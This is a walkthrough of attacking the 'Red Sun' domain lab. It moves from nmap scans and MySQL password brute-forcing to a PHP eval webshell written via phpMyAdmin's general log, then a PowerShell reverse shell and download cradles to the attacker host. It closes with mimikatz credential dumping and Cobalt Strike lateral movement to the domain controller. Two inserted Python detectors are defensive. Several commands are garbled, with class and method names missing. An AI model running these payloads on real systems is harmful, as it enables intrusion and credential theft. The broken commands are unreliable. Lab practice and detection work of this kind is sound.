Red Sun Target Machine (I) Notes
Summary
This is a domain-penetration target machine on which you can practise some domain-penetration knowledge. The main thing is to become familiar with PowerShell syntax: PowerShell tends to be more powerful than the cmd command line, and many open-source penetration scripts are written in PowerShell, for example Nishang, PowerView and so on. This is a beginner target machine for domain penetration; I ran into some problems with it.
Target machine address:/vuln/detail/2/
Default password for Red Sun Target: hongrisec@2019
In my case:
- web:192.168.81.239
- win7: 192.168.52.141
- Domain Control: 192.168.52.138
My Kali attack machine is 192.168.81.37.
I. nmap scanning
1) Host discovery
sudo nmap -sn 192.168.81.0/24
Nmap scan report for 192.168.81.239
Host is up (0.00047s latency).
MAC Address: 00:0C:29:EC:F8:D6 (VMware)
The target machine's IP is 192.168.81.239.
2) Port scanning
sudo nmap -sT --min-rate 10000 -p- 192.168.81.239
# Nmap 7.93 scan initiated Wed Sep 4 05:56:09 2024 as: nmap -sT --min-rate 10000 -p- -o ports 192.168.81.239
Warning: 192.168.81.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.81.239
Host is up (0.00079s latency).
Not shown: 61205 closed tcp ports (conn-refused), 4319 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1230/tcp open periscope
3306/tcp open mysql
MAC Address: 00:0C:29:EC:F8:D6 (VMware)
# Nmap done at Wed Sep 4 05:56:21 2024 -- 1 IP address (1 host up) scanned in 12.44 seconds
Extract the open ports:
cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','
Assign them to a variable:
ports=$(cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',')
3) Detailed information scanning
Here, pressing the Tab key after $ports expands the variable and displays its value.
sudo nmap -sT -sV -sC -O -p$ports 192.168.81.239 -o details
# Nmap 7.93 scan initiated Wed Sep 4 06:01:26 2024 as: nmap -sT -sC -sV -O -p80,135,139,445,1025,1026,1027,1028,1029,1230,3306 -o details 192.168.81.239
Nmap scan report for 192.168.81.239
Host is up (0.00097s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1029/tcp open msrpc Microsoft Windows RPC
1230/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:EC:F8:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 000c29ecf8d6 (VMware)
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-09-04T10:02:28
|_ start_date: 2024-09-04T09:46:14
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: stu1
| NetBIOS computer name: STU1\x00
| Domain name:
| Forest name:
| FQDN:
|_ System time: 2024-09-04T18:02:28+08:00
OS and Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Wed Sep 4 06:02:39 2024 -- 1 IP address (1 host up) scanned in 73.24 seconds
II. Web Penetration
Open the web page. It is a phpStudy PHP probe; scrolling down, there is a button to test the MySQL connection.
Enter anything in the form and turn on Burp to capture the request.
sudo vi pass_req
Paste the captured request in HTTP raw format.
POST / HTTP/1.1
Host: 192.168.81.239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Origin: http://192.168.81.239
Connection: close
Referer: http://192.168.81.239/
Upgrade-Insecure-Requests: 1
host=localhost&port=3306&login=FUZZ1&password=FUZZ2&act=MySQL%E6%A3%80%E6%B5%8B&funName=
Change the parameters to be brute-forced to FUZZ placeholders: login=FUZZ1&password=FUZZ2
1) Password brute-forcing
Here I use the ffuf utility: -mode selects the attack mode (clusterbomb here), and each -w supplies a wordlist, a fairly conventional username list and a weak-password list.
Of course, Burp works just as well; it is up to you.
sudo ffuf --request pass_req -u http://192.168.81.239 -w /usr/share/SecLists/Usernames/:FUZZ1 -w /usr/share/SecLists/Passwords/2023-200_most_used_passwords.txt:FUZZ2 -fs 14807 -mode clusterbomb
Results:
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : http://192.168.81.239
:: Wordlist : FUZZ1: /usr/share/SecLists/Usernames/
:: Wordlist : FUZZ2: /usr/share/SecLists/Passwords/2023-200_most_used_passwords.txt
:: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Origin: http://192.168.81.239
:: Header : Connection: close
:: Header : Referer: http://192.168.81.239/
:: Header : Host: 192.168.81.239
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
:: Header : Accept-Encoding: gzip, deflate
:: Header : Upgrade-Insecure-Requests: 1
:: Data : host=localhost&port=3306&login=FUZZ1&password=FUZZ2&act=MySQL%E6%A3%80%E6%B5%8B&funName=
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 14807
________________________________________________
[Status: 200, Size: 14804, Words: 1464, Lines: 401, Duration: 2136ms]
* FUZZ1: root
* FUZZ2: root
:: Progress: [3400/3400] :: Job [1/1] :: 19 req/sec :: Duration: [0:02:59] :: Errors: 0 ::
A weak password exists: root:root
Save it to a credentials file:
echo 'root:root' > creds
2) Directory brute-forcing
We have the database credentials, and this is a phpStudy site, so let's do some directory brute-forcing to see whether there are any backend pages and the like.
sudo gobuster dir -u http://192.168.81.239 -w /usr/share/wordlists/dirbuster/directory-list-2.
Here we use gobuster, but many tools can do directory brute-forcing: feroxbuster, ffuf, dirb, dirsearch, wfuzz and so on all have the corresponding function. The tools use different algorithms, so when one tool gets nowhere, try another; it may well give the results we want!
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.81.239
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/%20 (Status: 403) [Size: 210]
/*checkout* (Status: 403) [Size: 219]
/phpmyadmin (Status: 301) [Size: 241] [--> http://192.168.81.239/phpmyadmin/]
/*docroot* (Status: 403) [Size: 218]
/* (Status: 403) [Size: 210]
/con (Status: 403) [Size: 212]
/http%3A (Status: 403) [Size: 214]
/**http%3a (Status: 403) [Size: 216]
/*http%3A (Status: 403) [Size: 215]
/aux (Status: 403) [Size: 212]
/**http%3A (Status: 403) [Size: 216]
/%C0 (Status: 403) [Size: 210]
/%3FRID%3D2671 (Status: 403) [Size: 218]
/devinmoore* (Status: 403) [Size: 220]
/200109* (Status: 403) [Size: 216]
/*sa_ (Status: 403) [Size: 213]
/*dc_ (Status: 403) [Size: 213]
/%D8 (Status: 403) [Size: 210]
/%CE (Status: 403) [Size: 210]
/%CF (Status: 403) [Size: 210]
/%CD (Status: 403) [Size: 210]
/%CB (Status: 403) [Size: 210]
/%CC (Status: 403) [Size: 210]
/%D1 (Status: 403) [Size: 210]
/%CA (Status: 403) [Size: 210]
/%D0 (Status: 403) [Size: 210]
/%D3 (Status: 403) [Size: 210]
/%D6 (Status: 403) [Size: 210]
/%D7 (Status: 403) [Size: 210]
/%D5 (Status: 403) [Size: 210]
/%D4 (Status: 403) [Size: 210]
/%D2 (Status: 403) [Size: 210]
/%C9 (Status: 403) [Size: 210]
/%C1 (Status: 403) [Size: 210]
/%C8 (Status: 403) [Size: 210]
/%C2 (Status: 403) [Size: 210]
/%C5 (Status: 403) [Size: 210]
/%C6 (Status: 403) [Size: 210]
/%C7 (Status: 403) [Size: 210]
/%C3 (Status: 403) [Size: 210]
/%C4 (Status: 403) [Size: 210]
/%D9 (Status: 403) [Size: 210]
/%DE (Status: 403) [Size: 210]
/%DF (Status: 403) [Size: 210]
/%DD (Status: 403) [Size: 210]
/%DB (Status: 403) [Size: 210]
/phpMyAdmin (Status: 301) [Size: 241] [--> http://192.168.81.239/phpMyAdmin/]
/login%3f (Status: 403) [Size: 215]
/%22james%20kim%22 (Status: 403) [Size: 230]
/%22julie%20roehm%22 (Status: 403) [Size: 232]
/%22britney%20spears%22 (Status: 403) [Size: 235]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
There is a phpMyAdmin page; let's visit it.
Enter the credentials root:root that were just brute-forced.
We are now logged into the database backend.
III. Gaining a foothold
Ways of getting a shell from the phpMyAdmin backend:
- Write the webshell directly into the web directory with select ... into outfile (write access required)
- Write the webshell through the log file
For the first one, execute
SHOW VARIABLES LIKE '%secure%'
and see that secure_file_priv has the value NULL.
NULL disables writing to files. If this value is a directory name, files can only be written in the specified directory.
This is a read-only variable and can only be changed through the configuration file.
So the first method does not work.
The second method uses the log file.
SHOW VARIABLES LIKE 'general%'
general_log: the switch for the general query log, which can be set with an SQL statement.
general_log_file: the absolute path where the log is written.
With logging turned on, all of our SQL statements are recorded.
set global general_log=on;# Enable logging
set global general_log_file='C:/phpStudy/WWW/';# Set the log location to the web directory
The absolute path was already shown by the PHP probe at the beginning. Turn global logging on, then execute
select '<?php @eval($_GET["code"]);?>'
and visit the resulting file.
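As an added defender-side example (not part of the original write-up): a scanner that walks a web root for PHP files carrying the signature of a shell written through the MySQL general log, namely the log preamble (the "Time Id Command Argument" header and the numbered Query rows) wrapped around an eval of a request parameter, which no legitimate PHP file contains. The sample web root, its file names and the mysqld path in the constructed log text are assumptions.

```python
import os
import re
import tempfile

# Markers of a MySQL general-log body and of a one-line eval shell.
LOG_HEADER_RE = re.compile(r"^Time\s+Id\s+Command\s+Argument", re.MULTILINE)
LOG_QUERY_RE = re.compile(r"\b\d+ Query\t")  # "<thread id> Query<TAB><statement>" rows
EVAL_SHELL_RE = re.compile(
    r"@?\b(eval|assert)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE)


def classify_file(path):
    """Return the reasons this file looks like a log-written shell (empty list = clean)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    reasons = []
    if LOG_HEADER_RE.search(text) or LOG_QUERY_RE.search(text):
        reasons.append("mysql-general-log-preamble")
    if EVAL_SHELL_RE.search(text):
        reasons.append("eval-of-request-parameter")
    return reasons


def scan_webroot(webroot, exts=(".php", ".phtml", ".php5")):
    """Walk webroot; return {relative path: reasons} for every suspicious PHP file."""
    findings = {}
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                reasons = classify_file(full)
                if reasons:
                    findings[os.path.relpath(full, webroot)] = reasons
    return findings


def build_sample_webroot():
    """Constructed web root: a normal page plus a file shaped like general_log output."""
    root = tempfile.mkdtemp(prefix="www_")
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    log_shell = (  # constructed: what general_log writes around the injected SELECT
        "C:\\phpStudy\\MySQL\\bin\\mysqld.exe, Version: (constructed). started with:\n"
        "TCP Port: 3306, Named Pipe: MySQL\n"
        "Time                 Id Command    Argument\n"
        "240904 18:30:01\t    5 Query\tselect '<?php @eval($_GET[\"code\"]);?>'\n"
    )
    with open(os.path.join(root, "shell.php"), "w", encoding="utf-8") as fh:
        fh.write(log_shell)
    return root
```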
Reverse shell
In real attack and defence exercises it is also not recommended to connect directly with tools such as Chopper or AntSword, because their traffic characteristics are too obvious; a moment's inattention will trigger an alarm on the traffic-monitoring equipment. Although Godzilla encrypts its traffic, its Trojan format, communication protocol and behavioural characteristics are relatively fixed; if you want to use it, it is still recommended to do your own secondary development on top of it to get past some of the detection equipment.
a) Failed attempt
On the Kali side, start impacket's smbserver and listen on it.
The following command uses Python to share the current folder as an SMB share named share:
python /usr/share/doc/python3-impacket/examples/ share .
Listening port:
nc -lvp 8888
Command injection: visit the link
http://192.168.81.239/?code=system('\\\\192.168.81.37\\share\\ -e 192.168.81.37 8888 );
Here smb shows a normal connection, but I waited a long time for the shell to come back, which was a bit annoying, so I cheated and looked inside the Windows 7 box and found that the Win7 on this target machine is not compatible with nc; I tried both the 64-bit and 32-bit builds and neither works. But the idea is still worth sharing, so you can get a better feel for the SMB service!
b) Direct command injection
Google: php reverse windows powershell
Read the article: /from-php-s-hell-to-powershell-heaven-da40ce840da8
Get a more interactive shell with rlwrap:
sudo rlwrap nc -lvp 8888
PowerShell command to establish the connection:
powershell -nop -c "$client = New-Object ('192.168.81.37',8888);$stream = $();[byte[]]$bytes = 0..65535|%{0};while(($i = $($bytes, 0, $)) -ne 0){;$data = (New-Object -TypeName ).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([]::ASCII).GetBytes($sendback2);$($sendbyte,0,$);$()};$()"
Base64 encoding:
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
Because of the special characters in the command, typing it directly or URL-encoding it did not produce a connection, so I base64-encoded it and decode it with PHP's base64_decode() function to avoid any interference from the special characters.
Visit the link:
http://192.168.81.239/?code=system(base64_decode("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"));
The reverse shell connected.
I got lucky and the shell came back as a user with SYSTEM privileges, so there is no need for privilege escalation.
Once we have the shell, change the code page first:
chcp 65001
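A detection-side counterpart, added here and not part of the original write-up, to the ffuf run in II.1 and the ?code= command injection in this section: it parses Apache combined-format access log lines, flags a source IP that POSTs the probe form at / at a high rate, and flags requests whose URL-decoded query string carries a code-execution call. The combined log format, the threshold of 30 POSTs per minute and the sample IPs are assumptions, and the sample log is constructed.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache combined log format (assumed; the phpStudy site runs Apache 2.4 on Windows).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
SHELL_MARKERS = ("system(", "base64_decode(", "eval(", "shell_exec(")  # exec calls in ?code=

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return e

def find_bruteforce(entries, threshold=30, window=timedelta(seconds=60)):
    """Source IPs that POST the probe form at '/' at least `threshold` times inside `window`."""
    per_ip = {}
    for e in entries:
        if e["method"] == "POST" and e["path"] == "/":
            per_ip.setdefault(e["ip"], []).append(e["ts"])
    flagged = set()
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # sliding window over the sorted timestamps
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged

def find_webshell_hits(entries):
    """(ip, path) for every request whose URL-decoded query string carries an exec call."""
    hits = []
    for e in entries:
        query = unquote(e["path"].partition("?")[2]).lower()
        if any(marker in query for marker in SHELL_MARKERS):
            hits.append((e["ip"], e["path"]))
    return hits

def build_sample_log():
    """Constructed log: a 40-request POST burst from one IP (an ffuf run) plus two shell calls."""
    base = datetime.strptime("04/Sep/2024:18:00:00 +0800", "%d/%b/%Y:%H:%M:%S %z")
    ua = "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    lines = []
    for i in range(40):  # ffuf replays the browser's User-Agent, so the rate is the signal
        t = (base + timedelta(seconds=2 * i)).strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(f'10.0.0.5 - - [{t}] "POST / HTTP/1.1" 200 14807 "-" "{ua}"')
    lines.append('10.0.0.5 - - [04/Sep/2024:18:10:00 +0800] "GET /?code=system(%27ipconfig%27); HTTP/1.1" 200 30 "-" "x"')
    lines.append('10.0.0.5 - - [04/Sep/2024:18:11:00 +0800] "GET /?code=system(base64_decode(%22...%22)); HTTP/1.1" 200 0 "-" "x"')
    return lines
```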
IV. Domain information collection
View the NICs:
ipconfig /all
The NIC on the 192.168.52.0 segment should be the intranet NIC belonging to the domain; the hostname of the local machine and the domain information can also be seen.
System information:
systeminfo
The Domain field being populated indicates that this machine is in a domain.
For a regular machine the default value of this field is WORKGROUP.
You can also see which patches have been installed on the machine, as well as the network card information.
Routing information:
route print
Other hosts' information:
net view
View domain administrators:
V. Domain penetration
We know from our information gathering that the domain controller host is owa.
The domain name is
View the domain controller's IP:
ping
The domain controller's IP is 192.168.52.138.
Grabbing passwords with mimikatz
1) Upload Invoke-Mimikatz.ps1
Invoke-Mimikatz.ps1 link: /PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
Start an HTTP service:
php -S 0:80
View the PowerShell version on the machine:
$
The commands differ slightly before and after PowerShell 3.0.
The PowerShell on the target machine is version 2.0, and the Invoke-WebRequest cmdlet was only introduced in PowerShell 3.0.
So we use a .NET class to download the file:
powershell -command "& {(New-Object ).DownloadFile('http://192.168.81.37/Invoke-Mimikatz.ps1','c:\program files\Invoke-Mimikatz.ps1')}"
The HTTP service shows the download succeeded.
It was placed in the c:\program files directory:
cd c:\'program files'
dir
It uploaded successfully.
Of course, mimikatz also needs AV evasion, otherwise running it will trigger the antivirus as well.
2) Run mimikatz
To run Invoke-Mimikatz.ps1 in PowerShell we first need to relax the execution policy.
Get-ExecutionPolicy
Restricted: no scripts are allowed to run.
AllSigned: only scripts signed by a trusted publisher may run.
RemoteSigned: locally created scripts can run; scripts downloaded from the Internet must be signed.
Unrestricted: all scripts may run, but there is a warning when running scripts downloaded from the Internet.
Setting it to RemoteSigned is enough:
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
Of course, you can also use the Bypass parameter to bypass the policy for a single command.
Import the module:
Import-Module .\Invoke-Mimikatz.ps1
Load:
.\Invoke-Mimikatz.ps1
Execute:
Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"
There is no response.
In theory it should be able to grab passwords normally; I have had quite a few problems with this target machine.
Attempt to solve the problem (failed)
I wondered whether PowerShell is simply not very stable when it is executed from PHP.
Would the callback be more stable if we used Nishang's TCP script? Let's try a Nishang reverse shell.
sudo apt install nishang
Enter the command nishang to see its directory:
nishang
cd Shells
There is an Invoke-PowerShellTcp.ps1 file.
sudo vi Invoke-PowerShellTcp.ps1
At the bottom of the file, add the reverse-shell call
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.81.37 -Port 4444
so that as soon as the script is loaded into memory it executes the reverse-shell logic.
Kali listener, with the HTTP service running:
nc -lvp 4444
php -S 0:80
On the target's command line, execute
powershell -command "& {(new-object ).downloadfile('http://192.168.81.37/Invoke-PowerShellTcp.ps1','c:\Invoke-PowerShellTcp.ps1')}" ; c:\Invoke-PowerShellTcp.ps1
It downloaded successfully and I received the reverse shell, but it is the same kind of shell as before and still cannot run Invoke-Mimikatz.ps1.
3) Change of approach (using Cobalt Strike)
Start CS:
./teamserver localhost 123456
./cobaltstrike
Generate the Trojan and upload it:
powershell -ExecutionPolicy Bypass -command "& {(New-Object ).DownloadFile('http://192.168.81.37/', 'C:\Users\Public\')}"
Start it:
/c ".\"
It launched successfully.
Port scan
see that
Run mimikatz
We see the password for the domain controller owa: hongrisec@2022
VI. Taking the domain controller
We already have the domain administrator's password, so getting the domain controller is easy!
Create an SMB listener in CS.
Jump directly.
The domain controller came online.
I have the domain controller; I can go anywhere in this domain.
Jump to host 141.
All three machines were taken down.
Summary
- The nmap scan showed that the target web server has ports 80, 135 and 3306 open. Through directory brute-forcing on port 80 and weak-password fuzzing, the phpMyAdmin backend was found and logged into.
- Using the database's log output, a one-line webshell was written and a PowerShell reverse shell was obtained. Because of the limitations of the PowerShell 2.0 command line, I hit a situation during domain information collection where mimikatz could not be used, and my attempts to fix it failed.
- Finally, the Cobalt Strike framework was used to complete the lateral movement to the domain controller and obtain domain administrator privileges.